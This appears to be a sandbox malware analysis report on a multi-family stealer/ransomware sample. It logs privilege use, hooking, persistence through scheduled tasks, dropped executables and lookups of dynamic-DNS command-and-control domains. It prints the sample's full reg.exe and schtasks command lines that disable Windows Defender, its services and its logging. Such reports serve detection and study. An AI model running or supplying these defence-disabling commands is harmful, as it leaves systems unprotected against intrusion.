| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
NSIS installer
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | "C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe" |
| C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | "C:\Users\Admin\AppData\Roaming\WinDriversQt.exe" |
| C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | "C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe" |
| C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | "C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe" |
| C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | "C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe" |
| C:\Users\Admin\AppData\Roaming\nb662-full.exe | "C:\Users\Admin\AppData\Roaming\nb662-full.exe" |
| C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe" |
| C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
| C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f |
| C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f |
| C:\Windows\system32\reg.exe | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp" |
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DiFGHpZsWh" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBrhLIdmRX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp"
C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
"{path}"
C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
"{path}"
C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
"{path}"
C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
"{path}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | victoire.dyndns.biz | udp |
| US | 8.8.8.8:53 | maelus.mine.nu | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 173.194.69.94:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | maelus.mine.nu | udp |
| US | 8.8.8.8:53 | victoire.dyndns.biz | udp |
Files
C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
C:\Users\Admin\AppData\Roaming\nb662-full.exe
C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat
C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\LangDLL.dll
C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\System.dll
C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\UserInfo.dll
C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\cpudesc.dll
C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\nsDialogs.dll
C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\UAC.dll
C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\GetFLE.ini
C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\InstallOptions.dll
C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp
C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp
C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp